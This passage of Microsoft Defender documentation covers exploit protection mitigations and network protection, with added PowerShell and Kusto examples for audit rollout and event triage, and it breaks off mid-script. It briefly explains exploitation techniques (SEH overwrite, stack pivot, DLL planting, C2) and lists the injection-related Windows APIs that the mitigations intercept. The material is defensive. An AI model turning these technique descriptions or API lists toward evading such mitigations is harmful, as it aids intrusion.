Randomize memory allocations (Bottom-up ASLR) adds entropy to relocations, so their
location is randomized and therefore less predictable. This mitigation requires
Mandatory ASLR to take effect.

The size of the 32-bit address space places practical constraints on the entropy that can
be added, and therefore 64-bit applications make it more difficult for an attacker to
guess a location in memory.

Compatibility considerations
Most applications that are compatible with Mandatory ASLR (rebasing) are also
compatible with the other entropy of Bottom-up ASLR. Some applications may have
pointer-truncation issues if they're saving local pointers in 32-bit variables (expecting a
base address below 4 GB), and thus will be incompatible with the high entropy option
(which can be disabled).

Configuration options
Don't use high entropy - this option disables the use of high-entropy ASLR, which adds
24 bits of entropy (1 TB of variance) into the bottom-up allocation for 64-bit
applications.

Note

Randomize memory allocations (Bottom-up ASLR) has no audit mode.

Simulate execution (SimExec)

Description
Simulate execution (SimExec) is a mitigation for 32-bit applications only. This helps
validate that calls to sensitive APIs will return to legitimate caller functions. It does this
by intercepting calls into sensitive APIs, and then simulating the execution of those APIs
by walking through the encoded assembly language instructions looking for the RET
instruction, which should return to the caller. It then inspects that function and walks
backwards in memory to find the preceding CALL instruction to determine whether the
function and CALL instruction match, and that the RET hasn't been intercepted.

The APIs intercepted by this mitigation are:

LoadLibraryA
LoadLibraryW
LoadLibraryExA
LoadLibraryExW
LdrLoadDll
VirtualAlloc
VirtualAllocEx
NtAllocateVirtualMemory
VirtualProtect
VirtualProtectEx
NtProtectVirtualMemory
HeapCreate
RtlCreateHeap
CreateProcessA
CreateProcessW
CreateProcessInternalA
CreateProcessInternalW
NtCreateUserProcess
NtCreateProcess
NtCreateProcessEx
CreateRemoteThread
CreateRemoteThreadEx
NtCreateThreadEx
WriteProcessMemory
NtWriteVirtualMemory
WinExec
CreateFileMappingA
CreateFileMappingW
CreateFileMappingNumaW
NtCreateSection
MapViewOfFile
MapViewOfFileEx
MapViewOfFileFromApp
LdrGetProcedureAddressForCaller

If a ROP gadget is detected, the process is terminated.

Compatibility considerations
Applications that perform API interception, particularly security software, can cause
compatibility problems with this mitigation.

This mitigation is incompatible with the Arbitrary Code Guard mitigation.

Configuration options
Audit Only - You can enable this mitigation in audit mode in order to measure the
potential compatibility impact on an application. Audit events can then be viewed either
in the event viewer or using Advanced Hunting in Microsoft Defender for Endpoint.

Validate API invocation (CallerCheck)

Description
Validate API invocation (CallerCheck) is a mitigation for return-oriented programming
(ROP) techniques that validates that sensitive APIs were called from a valid caller. This
mitigation inspects the passed return address, and then heuristically disassembles
backwards to find a call above the return address to determine if the call target matches
the parameter passed into the function.

The APIs intercepted by this mitigation are:

LoadLibraryA
LoadLibraryW
LoadLibraryExA
LoadLibraryExW
LdrLoadDll
VirtualAlloc
VirtualAllocEx
NtAllocateVirtualMemory
VirtualProtect
VirtualProtectEx
NtProtectVirtualMemory
HeapCreate
RtlCreateHeap
CreateProcessA
CreateProcessW
CreateProcessInternalA
CreateProcessInternalW
NtCreateUserProcess
NtCreateProcess
NtCreateProcessEx
CreateRemoteThread
CreateRemoteThreadEx
NtCreateThreadEx
WriteProcessMemory
NtWriteVirtualMemory
WinExec
CreateFileMappingA
CreateFileMappingW
CreateFileMappingNumaW
NtCreateSection
MapViewOfFile
MapViewOfFileEx
MapViewOfFileFromApp
LdrGetProcedureAddressForCaller

If a ROP gadget is detected, the process is terminated.

Compatibility considerations
Applications that perform API interception, particularly security software, can cause
compatibility problems with this mitigation.

This mitigation is incompatible with the Arbitrary Code Guard mitigation.

Configuration options
Audit Only - You can enable this mitigation in audit mode in order to measure the
potential compatibility impact on an application. Audit events can then be viewed either
in the event viewer or using Advanced Hunting in Microsoft Defender for Endpoint.

Validate exception chains (SEHOP)

Description
Validate exception chains (SEHOP) is a mitigation against the Structured Exception
Handler (SEH) overwrite exploitation technique. Structured exception handling is the
process by which an application can ask to handle a particular exception. Exception
handlers are chained together, so that if one exception handler chooses not to handle a
particular exception, it can be passed on to the next exception handler in the chain until
one decides to handle it. Because the list of handlers is dynamic, it's stored on the stack.
An attacker can use a stack overflow vulnerability to then overwrite the exception
handler with a pointer to the code of the attacker's choice.

This mitigation relies on the design of SEH, where each SEH entry contains both a
pointer to the exception handler, and a pointer to the next handler in the exception
chain. This mitigation is called by the exception dispatcher, which validates the SEH
chain when an exception is invoked. It verifies that:

All exception chain records are within the stack boundaries
All exception records are aligned
No exception handler pointers are pointing to the stack
There are no backward pointers
The exception chain ends at a known final exception handler

If these validations fail, then exception handling is aborted, and the exception won't be
handled.

Compatibility considerations
Compatibility issues with SEHOP are relatively rare. It's uncommon for an application to
take a dependency on corrupting the exception chain. However, some applications are
impacted by the subtle changes in timing, which may manifest as a race condition that
reveals a latent multi-threading bug in the application.

Configuration options

Note

Validate exception chains (SEHOP) has no audit mode.

Validate handle usage

Description
Validate handle usage is a mitigation that helps protect against an attacker using an
existing handle to access a protected object. A handle is a reference to a protected
object. If application code is referencing an invalid handle, that could indicate that an
adversary is attempting to use a handle it has previously recorded (but which
application reference counting wouldn't be aware of). If the application attempts to use
an invalid object, instead of simply returning null, the application raises an exception
(STATUS_INVALID_HANDLE).

This mitigation is automatically applied to Windows Store applications.

Compatibility considerations
Applications that weren't accurately tracking handle references, and which weren't
wrapping these operations in exception handlers, will potentially be impacted by this
mitigation.

Configuration options

Note

Validate handle usage has no audit mode.

Validate heap integrity

Description
The validate heap integrity mitigation increases the protection level of heap mitigations
in Windows, by causing the application to terminate if a heap corruption is detected.
The mitigations include:

Preventing a HEAP handle from being freed
Performing another validation on extended block headers for heap allocations
Verifying that heap allocations aren't already flagged as in-use
Adding guard pages to large allocations, heap segments, and subsegments above
a minimum size

Compatibility considerations
This mitigation is already applied by default for 64-bit applications and for 32-bit
applications targeting Windows Vista or later. Legacy applications from Windows XP or
earlier are most at-risk, though compatibility issues are rare.

Configuration options

Note

Validate heap integrity has no audit mode.

Validate image dependency integrity

Description
The validate image dependency mitigation helps protect against attacks that attempt to
substitute code for dlls that are statically linked by Windows binaries. The technique of
DLL planting abuses the loader's search mechanism to inject malicious code, which can
be used to get malicious code running in an elevated context. When the loader is
loading a Windows signed binary, and then loads up any dlls that the binary depends
on, these binaries are verified to ensure that they're also digitally signed as a Windows
binary. If they fail the signature check, the dll won't be loaded, and throws an exception,
returning a status of STATUS_INVALID_IMAGE_HASH.

Compatibility considerations
Compatibility issues are uncommon. Applications that depend on replacing Windows
binaries with local private versions are impacted, and there's also a small risk of
revealing subtle timing bugs in multi-threaded applications.

Configuration options
Audit Only - You can enable this mitigation in audit mode in order to measure the
potential compatibility impact on an application. Audit events can then be viewed either
in the event viewer or using Advanced Hunting in Microsoft Defender for Endpoint.

Validate stack integrity (StackPivot)

Description
The validate stack integrity (StackPivot) mitigation helps protect against the Stack Pivot
attack, a ROP attack where an attacker creates a fake stack in heap memory, and then
tricks the application into returning into the fake stack that controls the flow of
execution.

This mitigation intercepts many Windows APIs, and inspects the value of the stack
pointer. If the address of the stack pointer doesn't fall between the bottom and the top
of the stack, then an event is recorded and, if not in audit mode, the process is
terminated.

The APIs intercepted by this mitigation are:

LoadLibraryA
LoadLibraryW
LoadLibraryExA
LoadLibraryExW
LdrLoadDll
VirtualAlloc
VirtualAllocEx
NtAllocateVirtualMemory
VirtualProtect
VirtualProtectEx
NtProtectVirtualMemory
HeapCreate
RtlCreateHeap
CreateProcessA
CreateProcessW
CreateProcessInternalA
CreateProcessInternalW
NtCreateUserProcess
NtCreateProcess
NtCreateProcessEx
CreateRemoteThread
CreateRemoteThreadEx
NtCreateThreadEx
WriteProcessMemory
NtWriteVirtualMemory
WinExec
CreateFileMappingA
CreateFileMappingW
CreateFileMappingNumaW
NtCreateSection
MapViewOfFile
MapViewOfFileEx
MapViewOfFileFromApp
LdrGetProcedureAddressForCaller

Compatibility considerations
Applications that are using fake stacks are impacted, and there's also a small risk of
revealing subtle timing bugs in multi-threaded applications. Applications that perform
API interception, particularly security software, can cause compatibility problems with
this mitigation.

This mitigation is incompatible with the Arbitrary Code Guard mitigation.

Configuration options
Audit Only - You can enable this mitigation in audit mode in order to measure the
potential compatibility impact on an application. Audit events can then be viewed either
in the event viewer or using Advanced Hunting in Microsoft Defender for Endpoint.
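The Audit Only options described throughout this reference correspond to switches of the built-in ProcessMitigations PowerShell module, and the resulting events land in the Security-Mitigations event channels. The following script is an added example, not taken from the Microsoft documentation: it assumes the mitigation option names of that module (Get-Help Set-ProcessMitigation lists them) and uses ExampleApp.exe as a placeholder image name.

```powershell
# Added example (not from the Microsoft docs): roll out exploit protection for one
# application in audit mode first, enable enforce-only mitigations separately, then
# review what audit mode recorded. Run in an elevated PowerShell session.
$app = 'ExampleApp.exe'   # placeholder: image name only, not a full path

# 1. Mitigations that have an audit mode: use the Audit* switch so compatibility
#    impact is logged rather than enforced (names assumed from the module).
$auditSwitches = @(
    'AuditFont'              # Block untrusted fonts
    'AuditMicrosoftSigned'   # Code integrity guard
    'AuditSystemCall'        # Disable Win32k system calls
    'AuditChildProcess'      # Don't allow child processes
)
Set-ProcessMitigation -Name $app -Enable $auditSwitches

# 2. Mitigations with no audit mode are enforce-only. Enable these only after checking
#    the binaries (Mandatory/Bottom-up ASLR need relocation data, StrictHandle needs
#    correct handle tracking in the application).
$enforceSwitches = @(
    'DEP'                    # Data Execution Prevention
    'EmulateAtlThunks'       # ATL thunk emulation for legacy ATL components
    'SEHOP'                  # Validate exception chains
    'ForceRelocateImages'    # Force randomization for images (Mandatory ASLR)
    'BottomUp'               # Randomize memory allocations (Bottom-up ASLR)
    'HighEntropy'            # 24 bits of extra entropy for 64-bit images
    'StrictHandle'           # Validate handle usage
)
Set-ProcessMitigation -Name $app -Enable $enforceSwitches

# 3. Read back the effective per-process configuration.
Get-ProcessMitigation -Name $app

# 4. Audit and block events are written to the Security-Mitigations channels under
#    Applications and Services Logs. Pull the last 7 days of events for this image.
$logs = (Get-WinEvent -ListLog 'Microsoft-Windows-Security-Mitigations*').LogName
Get-WinEvent -FilterHashtable @{ LogName = $logs; StartTime = (Get-Date).AddDays(-7) } `
             -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -match [regex]::Escape($app) } |
    Select-Object TimeCreated, LogName, Id, Message |
    Format-List

# 5. Export the registry-backed configuration as XML so the same settings can be
#    deployed with Intune or Group Policy instead of being set per device.
Get-ProcessMitigation -RegistryConfigFilePath "$env:TEMP\ExploitProtection.xml"
```

Once a week of audit events shows no legitimate activity for the image, replace the Audit* switches with their enforcing counterparts (for example DisableNonSystemFonts, MicrosoftSignedOnly, DisableWin32kSystemCalls, DisallowChildProcessCreation).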

Tip
Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.



Protect your network
Article • 02/02/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR
Microsoft Defender Antivirus

Platforms

Windows
macOS
Linux

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Overview of network protection

Network protection helps protect devices from Internet-based events. Network
protection is an attack surface reduction capability. It helps prevent employees from
accessing dangerous domains through applications. Domains that host phishing scams,
exploits, and other malicious content on the Internet are considered dangerous.
Network protection expands the scope of Microsoft Defender SmartScreen to block all
outbound HTTP(S) traffic that attempts to connect to low-reputation sources (based on
the domain or hostname).

Network protection extends the protection in Web protection to the operating system
level, and is a core component for Web Content Filtering (WCF). It provides the web
protection functionality found in Microsoft Edge to other supported browsers and non-
browser applications. Network protection also provides visibility and blocking of
indicators of compromise (IOCs) when used with Endpoint detection and response. For
example, network protection works with your custom indicators that you can use to
block specific domains or host names.

Network protection coverage

The following table summarizes network protection areas of coverage.

Feature                  Microsoft Edge                 3rd-party browsers                          Non-browser processes (e.g. PowerShell)
Web Threat Protection    SmartScreen must be enabled    Network protection must be in block mode    Network protection must be in block mode
Custom Indicators        SmartScreen must be enabled    Network protection must be in block mode    Network protection must be in block mode
Web Content Filtering    SmartScreen must be enabled    Network protection must be in block mode    Not supported


Note

On Mac and Linux, you must have network protection in block mode to get support
for these features in Edge. On Windows, network protection does not monitor
Microsoft Edge. For processes other than Microsoft Edge and Internet Explorer,
web protection scenarios leverage network protection for inspection and
enforcement.

IP is supported for all three protocols (TCP, HTTP, and HTTPS (TLS)).
Only single IP addresses are supported (no CIDR blocks or IP ranges) in
custom indicators.
Encrypted URLs (full path) can only be blocked on first party browsers
(Internet Explorer, Edge).
Encrypted URLs (FQDN only) can be blocked in third party browsers (i.e. other
than Internet Explorer, Edge).
Full URL path blocks can be applied for unencrypted URLs.

There might be up to 2 hours of latency (usually less) between the time the action
is taken, and the URL and IP being blocked.

Watch this video to learn how Network protection helps reduce the attack surface of
your devices from phishing scams, exploits, and other malicious content.
https://www.microsoft.com/en-us/videoplayer/embed/RE4r4yZ?postJsllMsg=true

Requirements for network protection

Network protection requires Windows 10 or 11 (Pro or Enterprise), Windows Server
version 1803 or later, macOS version 11 or later, or Defender Supported Linux versions,
and Microsoft Defender Antivirus real-time protection.

Windows version                                           Microsoft Defender Antivirus
Windows 10 version 1709 or later, Windows 11,             Make sure that Microsoft Defender Antivirus real-time
Windows Server 1803 or later                              protection and cloud-delivered protection are enabled (active)
Windows Server 2012 R2 and Windows Server 2016            Platform Update version 4.18.2001.x.x or newer
with the unified agent
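The requirements above can be checked on a device with the built-in Defender cmdlets before network protection is turned on. The following PowerShell function is an added example and not part of the Microsoft documentation; it assumes the build numbers of Windows 10 1709 (16299) and Windows Server 1803 (17134), and the Windows Server switches it sets are assumed from Set-MpPreference.

```powershell
# Added example (not from the Microsoft docs): verify the network protection prerequisites
# (supported OS build, Microsoft Defender Antivirus real-time protection, cloud-delivered
# protection), report the current network protection state, and optionally start it in
# audit mode. Down-level servers (2012 R2 / 2016) need the unified agent and are not
# covered by the build check.
function Test-NetworkProtectionReadiness {
    param([switch]$EnableAudit)

    $os     = Get-CimInstance -ClassName Win32_OperatingSystem
    $build  = [int]$os.BuildNumber
    $status = Get-MpComputerStatus
    $pref   = Get-MpPreference

    # ProductType 1 = workstation; 2 and 3 = domain controller / server.
    # Windows 10 1709 is build 16299 (assumed); Windows Server 1803 is build 17134 (assumed).
    $isClient    = ($os.ProductType -eq 1)
    $osSupported = if ($isClient) { $build -ge 16299 } else { $build -ge 17134 }

    # EnableNetworkProtection: 0 = Disabled, 1 = Enabled (block mode), 2 = AuditMode
    $npState = switch ([int]$pref.EnableNetworkProtection) {
        0 { 'Disabled' } 1 { 'Enabled' } 2 { 'AuditMode' } default { 'Unknown' }
    }

    $report = [PSCustomObject]@{
        OS                        = $os.Caption
        Build                     = $build
        OSSupported               = $osSupported
        RealTimeProtectionEnabled = [bool]$status.RealTimeProtectionEnabled
        # MAPSReporting 0 = off, 1 = basic, 2 = advanced; cloud-delivered protection needs 1 or 2
        CloudProtectionEnabled    = ([int]$pref.MAPSReporting -ne 0)
        PlatformVersion           = $status.AMProductVersion
        NetworkProtection         = $npState
    }
    $ready = $report.OSSupported -and $report.RealTimeProtectionEnabled -and $report.CloudProtectionEnabled

    if ($EnableAudit -and $ready -and $npState -eq 'Disabled') {
        # Audit mode only logs the connections block mode would have stopped; move to
        # Enabled after reviewing those events for legitimate traffic.
        Set-MpPreference -EnableNetworkProtection AuditMode
        if (-not $isClient) {
            # Windows Server needs these additional switches (assumed from Set-MpPreference).
            Set-MpPreference -AllowNetworkProtectionOnWinServer $true -AllowDatagramProcessingOnWinServer $true
        }
        $report.NetworkProtection = 'AuditMode'
    }
    $report | Add-Member -NotePropertyName Ready -NotePropertyValue $ready -PassThru
}

# Usage: report only, or add -EnableAudit to switch network protection to audit mode
# when every prerequisite is met.
Test-NetworkProtectionReadiness | Format-List
```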

Why network protection is important

Network protection is a part of the attack surface reduction group of solutions in
Microsoft Defender for Endpoint. Network protection enables the network layer to block
URLs and IP addresses. Network protection can block URLs from being accessed by
using certain browsers and standard network connections. By default, network
protection guards your computers from known malicious URLs using the SmartScreen
feed, which blocks malicious URLs in a manner similar to SmartScreen in Microsoft Edge
browser. The network protection functionality can be extended to:

Block IP/URL addresses from your own threat intelligence (indicators)
Block unsanctioned services from Microsoft Defender for Cloud Apps
Block browser access to websites based on category (Web content filtering)

Network protection is a critical part of the Microsoft protection and response stack.

 Tip

For details about network protection for Windows Server, Linux, MacOS and Mobile
Threat Defense (MTD), see Proactively hunt for threats with advanced hunting.

Block Command and Control attacks


Command and Control (C2) server computers are used by malicious users to send
commands to systems previously compromised by malware. C2 attacks typically hide in
cloud-based services such as file-sharing and webmail services, enabling the C2 servers
to avoid detection by blending in with typical traffic.
C2 servers can be used to initiate commands that can:

Steal data
Control compromised computers in a botnet
Disrupt legitimate applications
Spread malware, such as ransomware

The network protection component of Defender for Endpoint identifies and blocks
connections to C2 infrastructures used in human-operated ransomware attacks, using
techniques like machine learning and intelligent indicator-of-compromise (IoC)
identification.

Network protection: C2 detection and remediation

In its initial form, ransomware is a commodity threat, pre-programmed and focused on
limited, specific outcomes (for example, encrypting a computer). However, ransomware
has evolved into a sophisticated threat that is human-driven, adaptive, and focused on
larger scale and more widespread outcomes, like holding an entire organization's assets
or data for ransom.

Support for Command and Control servers (C2) is a key part of this ransomware
evolution and is what enables these attacks to adapt to the environment they target.
Breaking the link to the command-and-control infrastructure stops the progression of
an attack to its next stage. For additional information about C2 detection and
remediation, see Detecting and remediating command and control attacks at the
network layer.

Network protection: New toast notifications

New mapping | Response category | Sources
phishing | Phishing | SmartScreen
malicious | Malicious | SmartScreen
command and control | C2 | SmartScreen
command and control | COCO | SmartScreen
malicious | Untrusted | SmartScreen
by your IT admin | CustomBlockList |
by your IT admin | CustomPolicy |

7 Note

customAllowList does not generate notifications on endpoints.

New notifications for network protection determination


A new, publicly available capability in network protection utilizes functions in
SmartScreen to block phishing activities from malicious command and control sites.

When an end user attempts to visit a website in an environment in which network
protection is enabled, three scenarios are possible:

The URL has a known good reputation - The user is permitted access without
obstruction, and there's no toast notification presented on the endpoint. In effect,
the domain or URL is set to Allowed.
The URL has an unknown or uncertain reputation - The user's access is blocked, but
with the ability to circumvent (unblock) the block. In effect, the domain or URL is
set to Audit.
The URL has a known bad (malicious) reputation - The user is prevented from access.
In effect, the domain or URL is set to Block.

Warn experience

A user visits a website:

If the url has an unknown or uncertain reputation, a toast notification will present
the user with the following options:

Ok - The toast notification is released (removed), and the attempt to access the
site is ended.

Unblock - The user will have access to the site for 24 hours; at which point the
block is reenabled. The user can continue to use Unblock to access the site until
such time that the administrator prohibits (blocks) the site, thus removing the
option to Unblock.

Feedback - The toast notification presents the user with a link to submit a ticket,
which the user can use to submit feedback to the administrator in an attempt to
justify access to the site.

7 Note

The images shown here for warn experience and block experience (below)
both list "blocked url" as example placeholder text; in a functioning
environment the actual url or domain will be listed.

Block experience
A user visits a website:

If the URL has a bad reputation, a toast notification will present the user with the
following options:

Ok - The toast notification is released (removed), and the attempt to access the
site is ended.

Feedback - The toast notification presents the user with a link to submit a ticket,
which the user can use to submit feedback to the administrator in an attempt to
justify access to the site.


SmartScreen Unblock
With indicators in Defender for Endpoint, administrators can allow end users to bypass
warnings that are generated for some URLs and IPs. Depending on why the URL was
blocked, when a SmartScreen block is encountered it may offer the ability to unblock
the site for up to 24 hours. In such cases, a Windows Security toast notification will
appear, permitting the end-user to Unblock the URL or IP for the defined period of time.

Microsoft Defender for Endpoint administrators can configure SmartScreen Unblock
functionality in the Microsoft Defender portal using an "allow" indicator for IPs, URLs,
and domains. See Create indicators for IPs and URLs/domains.

Using network protection


Network protection is enabled per device, which is typically done using your
management infrastructure. For supported methods, see Turn on network protection.

7 Note

Microsoft Defender Antivirus must be active to enable network protection.

You can enable network protection in Audit mode or Block mode. If you want to
evaluate the impact of enabling network protection before actually blocking IP
addresses or URLs, you can enable network protection in Audit mode for a period of
time to gather data on what would be blocked. Audit mode logs when end users have
connected to an address or site that would otherwise have been blocked by network
protection. Note that for indicators of compromise (IoC) and Web content filtering
(WCF) to be enforced, network protection must be in Block mode.

For information about network protection for Linux and macOS see: Network protection
for Linux and Network protection for macOS.

Advanced hunting
If you're using advanced hunting to identify audit events, you have up to 30 days of
history available from the console. See Advanced hunting.

You can find the audit events in Advanced hunting in the Defender for Endpoint portal
(https://security.microsoft.com ).

Audit events are in DeviceEvents with an ActionType of
ExploitGuardNetworkProtectionAudited. Blocks are shown with an ActionType of
ExploitGuardNetworkProtectionBlocked.

Here's an example query for viewing network protection events. These events cover
third-party browsers and other processes; Microsoft Defender SmartScreen events from
Microsoft Edge use a different ActionType, as described later in this section:

Kusto

DeviceEvents
| where ActionType in ('ExploitGuardNetworkProtectionAudited', 'ExploitGuardNetworkProtectionBlocked')


 Tip

These entries carry extra detail in the AdditionalFields column. If you expand
AdditionalFields, you also get the fields IsAudit, ResponseCategory, and DisplayName.

Here's another example:

Kusto

DeviceEvents
|where ActionType contains "ExploitGuardNetworkProtection"
|extend ParsedFields=parse_json(AdditionalFields)
|project DeviceName, ActionType, Timestamp, RemoteUrl,
InitiatingProcessFileName, IsAudit=tostring(ParsedFields.IsAudit),
ResponseCategory=tostring(ParsedFields.ResponseCategory),
DisplayName=tostring(ParsedFields.DisplayName)
|sort by Timestamp desc

The Response category tells you what caused the event, for example:

ResponseCategory | Feature responsible for the event
CustomPolicy | WCF
CustomBlockList | Custom indicators
CasbPolicy | Defender for Cloud Apps
Malicious | Web threats
Phishing | Web threats

For more information, see Troubleshoot endpoint blocks.

Note that Microsoft Defender SmartScreen events for the Microsoft Edge browser
specifically need a different query:

Kusto

DeviceEvents
| where ActionType == "SmartScreenUrlWarning"
| extend ParsedFields=parse_json(AdditionalFields)
| project DeviceName, ActionType, Timestamp, RemoteUrl,
InitiatingProcessFileName

You can use the resulting list of URLs and IPs to determine what would have been
blocked if the device were in Block mode, and which feature blocked them. Review each
item on the list to identify URLs or IPs that are necessary to your environment. If
you find any audited entries that are critical to your environment, create an indicator
to allow them in your network. Allow URL/IP indicators take precedence over any block.

Once you've created an indicator, you can look at resolving the underlying issue:

SmartScreen – request review
Indicator – modify the existing indicator
Defender for Cloud Apps (MCA) – review the unsanctioned app
WCF – request recategorization

Using this data you can make an informed decision on enabling Network protection in
Block mode. See Order of precedence for Network protection blocks.
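The triage described above (audit events, the ResponseCategory-to-feature mapping, allow indicators, and the per-feature follow-up) as an added PowerShell example. This is not code from the Microsoft documentation. It assumes you have exported rows from the advanced hunting query above (for example through the API or a CSV export) into PowerShell objects with the same column names and with AdditionalFields as the raw JSON string; the sample rows, hostnames, and the -RequiredHosts list are constructed for illustration.

```powershell
# Added example (not from the Defender for Endpoint documentation): triage network
# protection audit/block events and decide which URLs need an allow indicator before
# a device moves to Block mode. Input shape assumed: one object per advanced hunting
# row (DeviceName, ActionType, Timestamp, RemoteUrl, InitiatingProcessFileName,
# AdditionalFields as a JSON string). $sampleEvents below is constructed, not real data.

# ResponseCategory -> feature that produced the event, and the follow-up listed on
# the page once an allow indicator is in place.
$categoryMap = @{
    CustomPolicy    = @{ Feature = 'Web content filtering';     FollowUp = 'request recategorization' }
    CustomBlockList = @{ Feature = 'Custom indicators';         FollowUp = 'modify the existing indicator' }
    CasbPolicy      = @{ Feature = 'Defender for Cloud Apps';   FollowUp = 'review the unsanctioned app' }
    Malicious       = @{ Feature = 'Web threats (SmartScreen)'; FollowUp = 'request a SmartScreen review' }
    Phishing        = @{ Feature = 'Web threats (SmartScreen)'; FollowUp = 'request a SmartScreen review' }
}

function Get-UrlHost {
    param([string]$Url)
    # RemoteUrl can arrive without a scheme (FQDN-only blocks); [uri] needs one to parse
    if ($Url -notmatch '^[a-z][a-z0-9+.-]*://') { $Url = "http://$Url" }
    return ([uri]$Url).Host
}

function Get-NetworkProtectionTriage {
    param(
        [Parameter(Mandatory)] [object[]] $Events,
        # Hosts the business has confirmed it needs (assumption: maintained by the admin)
        [string[]] $RequiredHosts = @()
    )

    $parsed = foreach ($e in $Events) {
        if ($e.ActionType -notlike 'ExploitGuardNetworkProtection*') { continue }
        $fields = $e.AdditionalFields | ConvertFrom-Json
        [pscustomobject]@{
            RemoteUrl        = $e.RemoteUrl
            Host             = Get-UrlHost $e.RemoteUrl
            DeviceName       = $e.DeviceName
            Process          = $e.InitiatingProcessFileName
            # IsAudit is a JSON boolean; go through Parse so a string "false" is not truthy
            IsAudit          = [bool]::Parse("$($fields.IsAudit)")
            ResponseCategory = [string]$fields.ResponseCategory
        }
    }

    foreach ($group in ($parsed | Group-Object RemoteUrl, ResponseCategory)) {
        $first    = $group.Group[0]
        $info     = $categoryMap[$first.ResponseCategory]
        $feature  = if ($info) { $info.Feature }  else { 'Unknown' }
        $followUp = if ($info) { $info.FollowUp } else { 'investigate the source' }
        if ($RequiredHosts -contains $first.Host) {
            # Allow indicators take precedence over any block; then fix the root cause
            $action = "Create an allow indicator for $($first.Host); then $followUp"
        } else {
            $action = 'Leave blocked'
        }
        [pscustomobject]@{
            RemoteUrl        = $first.RemoteUrl
            ResponseCategory = $first.ResponseCategory
            Feature          = $feature
            AuditedHits      = @($group.Group | Where-Object IsAudit).Count
            BlockedHits      = @($group.Group | Where-Object { -not $_.IsAudit }).Count
            Devices          = (@($group.Group.DeviceName) | Sort-Object -Unique) -join ', '
            Processes        = (@($group.Group.Process)    | Sort-Object -Unique) -join ', '
            Action           = $action
        }
    }
}

# Constructed sample rows (not real telemetry) in the shape of the query above
$sampleEvents = @(
    [pscustomobject]@{ DeviceName = 'ws01'; ActionType = 'ExploitGuardNetworkProtectionAudited'; Timestamp = '2024-03-01T08:00:00Z'; RemoteUrl = 'https://smartscreentestratings2.net'; InitiatingProcessFileName = 'chrome.exe';     AdditionalFields = '{"IsAudit":true,"ResponseCategory":"Malicious","DisplayName":"Malicious"}' }
    [pscustomobject]@{ DeviceName = 'ws02'; ActionType = 'ExploitGuardNetworkProtectionAudited'; Timestamp = '2024-03-01T08:05:00Z'; RemoteUrl = 'https://smartscreentestratings2.net'; InitiatingProcessFileName = 'firefox.exe';    AdditionalFields = '{"IsAudit":true,"ResponseCategory":"Malicious","DisplayName":"Malicious"}' }
    [pscustomobject]@{ DeviceName = 'ws01'; ActionType = 'ExploitGuardNetworkProtectionAudited'; Timestamp = '2024-03-01T09:10:00Z'; RemoteUrl = 'files.partner.example';                InitiatingProcessFileName = 'syncclient.exe'; AdditionalFields = '{"IsAudit":true,"ResponseCategory":"CustomPolicy","DisplayName":"Blocked by your IT admin"}' }
    [pscustomobject]@{ DeviceName = 'ws03'; ActionType = 'ExploitGuardNetworkProtectionBlocked'; Timestamp = '2024-03-01T09:12:00Z'; RemoteUrl = 'https://phish.example';                InitiatingProcessFileName = 'outlook.exe';    AdditionalFields = '{"IsAudit":false,"ResponseCategory":"Phishing","DisplayName":"Phishing"}' }
)

Get-NetworkProtectionTriage -Events $sampleEvents -RequiredHosts 'files.partner.example' |
    Sort-Object AuditedHits -Descending |
    Format-Table RemoteUrl, Feature, AuditedHits, BlockedHits, Devices, Action -AutoSize
```

With the sample rows, the test-ratings site shows two audited hits across two devices and two browsers and stays blocked, the partner host shows up as a WCF (CustomPolicy) audit and gets the allow-indicator-then-recategorize action, and the phishing URL appears as a real block from a device already in Block mode. Grouping on RemoteUrl and ResponseCategory together matters because the same URL can be hit by more than one feature, and each feature has its own fix.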

7 Note

As this is a per-device setting, if there are devices that cannot move to Block mode
you can simply leave them on audit until you can rectify the challenge and you will
still receive the auditing events.

For information about how to report false positives see Report false positives.

For details on how to create your own Power BI reports, see Create custom reports using
Power BI.

Configuring network protection


For more information about how to enable network protection, see Enable network
protection. Use Group Policy, PowerShell, or MDM CSPs to enable and manage network
protection in your network.

After you've enabled network protection, you might need to configure your network or
firewall to allow the connections between your endpoint devices and the web services:

.smartscreen.microsoft.com
.smartscreen-prod.microsoft.com

Viewing network protection events


Network protection works best with Microsoft Defender for Endpoint, which gives you
detailed reporting into exploit protection events and blocks as part of alert investigation
scenarios.

When network protection blocks a connection, a notification is displayed from the
Action Center. Your security operations team can customize the notification with your
organization's details and contact information. In addition, individual attack surface
reduction rules can be enabled and customized to suit certain techniques to monitor.

You can also use audit mode to evaluate how network protection would impact your
organization if it were enabled.

Review network protection events in the Microsoft Defender portal
Defender for Endpoint provides detailed reporting into events and blocks as part of its
alert investigation scenarios. You can view these details in the Microsoft Defender portal
(https://security.microsoft.com ) in the alerts queue or by using advanced hunting. If
you're using audit mode, you can use advanced hunting to see how network protection
settings would affect your environment if they were enabled.

Review network protection events in Windows Event Viewer
You can review the Windows event log to see events that are created when network
protection blocks (or audits) access to a malicious IP or domain:

1. Copy the XML directly.

2. Select OK.

This procedure creates a custom view that filters to only show the following events
related to network protection:

Event ID | Description
5007 | Event when settings are changed
1125 | Event when network protection fires in audit mode
1126 | Event when network protection fires in block mode
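The same three event IDs queried from PowerShell, as an added example that is not part of the Microsoft documentation. The XML below is the filter a custom Event Viewer view for these events would use (the page does not reproduce its own XML, so this is the editor's version); Get-WinEvent accepts the same XML with -FilterXml. It reads the local log only and needs an elevated session.

```powershell
# Added example (not from the Defender for Endpoint documentation): pull network
# protection events 1125/1126/5007 from the Defender operational log using the same
# XPath filter a custom Event Viewer view would use. Run elevated on the device.

$networkProtectionFilter = @"
<QueryList>
  <Query Id="0" Path="Microsoft-Windows-Windows Defender/Operational">
    <Select Path="Microsoft-Windows-Windows Defender/Operational">
      *[System[(EventID=1125 or EventID=1126 or EventID=5007)]]
    </Select>
  </Query>
</QueryList>
"@

function Get-NetworkProtectionEvents {
    param(
        [int]    $MaxEvents = 200,
        [switch] $BlocksOnly     # keep 1126 only, e.g. after switching a device to Block mode
    )
    $meaning = @{ 1125 = 'Audit: would have been blocked'; 1126 = 'Blocked'; 5007 = 'Settings changed' }

    # Get-WinEvent reports "no events found" as an error; an empty log is not a failure here
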